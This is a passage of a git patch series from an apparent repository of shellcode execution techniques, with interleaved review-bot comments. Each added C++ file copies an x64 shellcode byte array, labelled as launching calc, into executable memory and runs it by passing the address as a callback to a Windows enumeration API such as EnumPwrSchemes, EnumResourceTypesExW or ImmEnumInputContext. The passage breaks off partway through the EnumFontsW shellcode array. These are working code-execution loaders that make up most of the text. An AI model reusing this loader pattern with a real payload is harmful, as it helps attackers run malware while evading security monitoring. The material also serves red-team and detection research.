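Review bot: The project, folder and file are named EnumSystemLocales while the API actually exercised is `EnumSystemLocalesEx`, so anyone indexing this repository by technique will look for the wrong function; rename the project to EnumSystemLocalesEx or, failing that, add a header comment, `// Technique: EnumSystemLocalesEx callback`, naming the call. `VirtualAlloc` is not checked before the `memcpy`; `if (address == NULL) return 1;` belongs between them. The BOOL from `EnumSystemLocalesEx` is discarded, so a failed call and a successful one that reached the callback both exit 0; `if (!::EnumSystemLocalesEx((LOCALE_ENUMPROCEX)address, LOCALE_ALL, NULL, NULL)) return 1;` keeps the test result meaningful.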
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c9cda752-24af-48cc-9f54-a695a453a929} + EnumSystemLocales + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumSystemLocales/EnumSystemLocales.vcxproj.filters b/EnumSystemLocales/EnumSystemLocales.vcxproj.filters new file mode 100644 index 0000000..691e773 --- /dev/null +++ b/EnumSystemLocales/EnumSystemLocales.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 2a4d6063ba919a72f0ad1bbed71a8ed061c61782 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Sun, 11 Apr 2021 11:54:38 -0400 Subject: [PATCH 16/28] added EnumPwrSchemes --- AlternativeShellcodeExec.sln | 10 ++ EnumPwrSchemes/EnumPwrSchemes.cpp | 43 +++++ EnumPwrSchemes/EnumPwrSchemes.vcxproj | 147 ++++++++++++++++++ EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters | 22 +++ 4 files changed, 222 insertions(+) create mode 100644 EnumPwrSchemes/EnumPwrSchemes.cpp create mode 100644 EnumPwrSchemes/EnumPwrSchemes.vcxproj create mode 100644 EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index fd9be1c..97e9afc 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -67,6 +67,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumUILanguagesW", "EnumUIL EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumSystemLocales", "EnumSystemLocales\EnumSystemLocales.vcxproj", "{C9CDA752-24AF-48CC-9F54-A695A453A929}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPwrSchemes", "EnumPwrSchemes\EnumPwrSchemes.vcxproj", "{13291D07-600D-44D2-91F8-A1FEF83AB0FD}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -331,6 +333,14 @@ Global {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x64.Build.0 = Release|x64 {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.ActiveCfg = Release|Win32 {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.Build.0 = Release|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x64.ActiveCfg = Debug|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x64.Build.0 = Debug|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x86.ActiveCfg = Debug|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x86.Build.0 = Debug|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x64.ActiveCfg = Release|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x64.Build.0 = Release|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.ActiveCfg = Release|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumPwrSchemes/EnumPwrSchemes.cpp b/EnumPwrSchemes/EnumPwrSchemes.cpp new file mode 100644 index 0000000..03533ac --- /dev/null +++ b/EnumPwrSchemes/EnumPwrSchemes.cpp 
@@ -0,0 +1,43 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "PowrProf.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+
+ ::EnumPwrSchemes((PWRSCHEMESENUMPROC)address, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumPwrSchemes/EnumPwrSchemes.vcxproj b/EnumPwrSchemes/EnumPwrSchemes.vcxproj
new file mode 100644
index 0000000..b1cab44
--- /dev/null
+++ b/EnumPwrSchemes/EnumPwrSchemes.vcxproj
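Review bot: `EnumPwrSchemes` reports failure through its BOOL return and that is discarded, so a host where the power-scheme enumeration fails exits 0 exactly like one where the callback ran; `if (!::EnumPwrSchemes((PWRSCHEMESENUMPROC)address, NULL)) return 1;` makes a non-firing PoC visible. `VirtualAlloc` is unchecked before the `memcpy`, which dereferences NULL on an allocation failure; `if (address == NULL) return 1;` belongs between the two lines. A short comment on the `#pragma comment(lib, "PowrProf.lib")` line, `// EnumPwrSchemes is exported by powrprof.dll, hence the extra import library`, would tell a reader why this project, unlike most others in the series, needs a link dependency beyond the default set.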
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {13291d07-600d-44d2-91f8-a1fef83ab0fd} + EnumPwrSchemes + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters b/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters new file mode 100644 index 0000000..9509301 --- /dev/null +++ b/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 805bb460a8946c8f308fd9329b738cc5f49e4aab Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Mon, 12 Apr 2021 20:46:13 -0400 Subject: [PATCH 17/28] EnumResourceTypesExW added --- AlternativeShellcodeExec.sln | 10 ++ EnumResourceTypesExW/EnumResourceTypesExW.cpp | 43 +++++ .../EnumResourceTypesExW.vcxproj | 147 ++++++++++++++++++ .../EnumResourceTypesExW.vcxproj.filters | 22 +++ 4 files changed, 222 insertions(+) create mode 100644 EnumResourceTypesExW/EnumResourceTypesExW.cpp create mode 100644 EnumResourceTypesExW/EnumResourceTypesExW.vcxproj create mode 100644 EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 97e9afc..8d640bd 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -69,6 +69,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumSystemLocales", "EnumSy EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPwrSchemes", "EnumPwrSchemes\EnumPwrSchemes.vcxproj", "{13291D07-600D-44D2-91F8-A1FEF83AB0FD}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumResourceTypesExW", "EnumResourceTypesExW\EnumResourceTypesExW.vcxproj", "{D0AB9F7D-C35D-4E4F-840A-34597B466E1A}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -341,6 +343,14 @@ Global {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x64.Build.0 = Release|x64 {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.ActiveCfg = Release|Win32 {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.Build.0 = Release|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x64.ActiveCfg = Debug|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x64.Build.0 = Debug|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x86.ActiveCfg = Debug|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Debug|x86.Build.0 = Debug|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x64.ActiveCfg = Release|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x64.Build.0 = Release|x64 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.ActiveCfg = Release|Win32 + {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumResourceTypesExW/EnumResourceTypesExW.cpp b/EnumResourceTypesExW/EnumResourceTypesExW.cpp new file mode 100644 index 0000000..c15eb3c --- /dev/null +++ b/EnumResourceTypesExW/EnumResourceTypesExW.cpp 
@@ -0,0 +1,43 @@
+#include
+#include
+#include
+#include
+
+#pragma comment(lib, "KtmW32.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ EnumResourceTypesExW(::LoadLibraryW(L"Kernel32.dll"), (ENUMRESTYPEPROCW)address, NULL, RESOURCE_ENUM_VALIDATE, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj
new file mode 100644
index 0000000..fd0936a
--- /dev/null
+++ b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj
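Review bot: `::VirtualAlloc` at the top of `main` can return NULL, and that value flows unchecked into `memcpy` and then into the callback parameter, so an allocation failure becomes a NULL write rather than an orderly exit; add `if (address == NULL) return 1;` directly after the allocation. The same unchecked allocation is repeated in ImmEnumInputContext.cpp, EnumFontsW.cpp, EnumFontFamiliesW.cpp, EnumFontFamiliesExW.cpp and EnumObjects.cpp in the later patches. `#pragma comment(lib, "KtmW32.lib")` does not appear to be needed by anything in this file — EnumResourceTypesExW and LoadLibraryW are kernel32 exports that the default link already resolves — and looks carried over from another project, so confirm and drop it. A short header comment stating what the sample is meant to demonstrate for detection purposes — a private `PAGE_EXECUTE_READWRITE` commit whose address is then handed to a callback-registering API — would help readers who use this repository to build and validate telemetry rules.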
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {d0ab9f7d-c35d-4e4f-840a-34597b466e1a} + EnumResourceTypesExW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters new file mode 100644 index 0000000..cd5df53 --- /dev/null +++ b/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From bc26da74db6f0e177d11325602b86d50dab089fe Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Thu, 15 Apr 2021 21:55:39 -0400 Subject: [PATCH 18/28] k --- AlternativeShellcodeExec.sln | 10 ++ ImmEnumInputContext/ImmEnumInputContext.cpp | 42 +++++ .../ImmEnumInputContext.vcxproj | 147 ++++++++++++++++++ .../ImmEnumInputContext.vcxproj.filters | 22 +++ 4 files changed, 221 insertions(+) create mode 100644 ImmEnumInputContext/ImmEnumInputContext.cpp create mode 100644 ImmEnumInputContext/ImmEnumInputContext.vcxproj create mode 100644 ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 8d640bd..51f2ec4 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -71,6 +71,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPwrSchemes", "EnumPwrSc EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumResourceTypesExW", "EnumResourceTypesExW\EnumResourceTypesExW.vcxproj", "{D0AB9F7D-C35D-4E4F-840A-34597B466E1A}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImmEnumInputContext", "ImmEnumInputContext\ImmEnumInputContext.vcxproj", "{13C7FED8-77A0-4EE3-A431-6E77F22320C3}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -351,6 +353,14 @@ Global {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x64.Build.0 = Release|x64 {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.ActiveCfg = Release|Win32 {D0AB9F7D-C35D-4E4F-840A-34597B466E1A}.Release|x86.Build.0 = Release|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x64.ActiveCfg = Debug|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x64.Build.0 = Debug|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x86.ActiveCfg = Debug|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Debug|x86.Build.0 = Debug|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x64.ActiveCfg = Release|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x64.Build.0 = Release|x64 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.ActiveCfg = Release|Win32 + {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/ImmEnumInputContext/ImmEnumInputContext.cpp b/ImmEnumInputContext/ImmEnumInputContext.cpp new file mode 100644 index 0000000..86410c2 --- /dev/null +++ b/ImmEnumInputContext/ImmEnumInputContext.cpp 
@@ -0,0 +1,42 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "Imm32.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ ::ImmEnumInputContext(NULL, (IMCENUMPROC)address, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/ImmEnumInputContext/ImmEnumInputContext.vcxproj b/ImmEnumInputContext/ImmEnumInputContext.vcxproj
new file mode 100644
index 0000000..16740ef
--- /dev/null
+++ b/ImmEnumInputContext/ImmEnumInputContext.vcxproj
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {13c7fed8-77a0-4ee3-a431-6e77f22320c3} + ImmEnumInputContext + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters b/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters new file mode 100644 index 0000000..3284a4f --- /dev/null +++ b/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From dd68d8fc9f2c03e7dec7515e863751cfffbdcfe6 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Wed, 28 Apr 2021 21:19:43 -0400 Subject: [PATCH 19/28] EnumFontsW --- AlternativeShellcodeExec.sln | 10 ++ EnumFontsW/EnumFontsW.cpp | 41 +++++++ EnumFontsW/EnumFontsW.vcxproj | 147 ++++++++++++++++++++++++++ EnumFontsW/EnumFontsW.vcxproj.filters | 22 ++++ 4 files changed, 220 insertions(+) create mode 100644 EnumFontsW/EnumFontsW.cpp create mode 100644 EnumFontsW/EnumFontsW.vcxproj create mode 100644 EnumFontsW/EnumFontsW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 51f2ec4..9370be3 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -73,6 +73,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumResourceTypesExW", "Enu EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ImmEnumInputContext", "ImmEnumInputContext\ImmEnumInputContext.vcxproj", "{13C7FED8-77A0-4EE3-A431-6E77F22320C3}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontsW", "EnumFontsW\EnumFontsW.vcxproj", "{0091D5E9-A212-4C34-857F-0DB13D272AA2}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -361,6 +363,14 @@ Global {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x64.Build.0 = Release|x64 {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.ActiveCfg = Release|Win32 {13C7FED8-77A0-4EE3-A431-6E77F22320C3}.Release|x86.Build.0 = Release|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x64.ActiveCfg = Debug|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x64.Build.0 = Debug|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x86.ActiveCfg = Debug|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Debug|x86.Build.0 = Debug|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x64.ActiveCfg = Release|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x64.Build.0 = Release|x64 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.ActiveCfg = Release|Win32 + {0091D5E9-A212-4C34-857F-0DB13D272AA2}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumFontsW/EnumFontsW.cpp b/EnumFontsW/EnumFontsW.cpp new file mode 100644 index 0000000..b8da1e1 --- /dev/null +++ b/EnumFontsW/EnumFontsW.cpp 
@@ -0,0 +1,41 @@
+#include
+
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
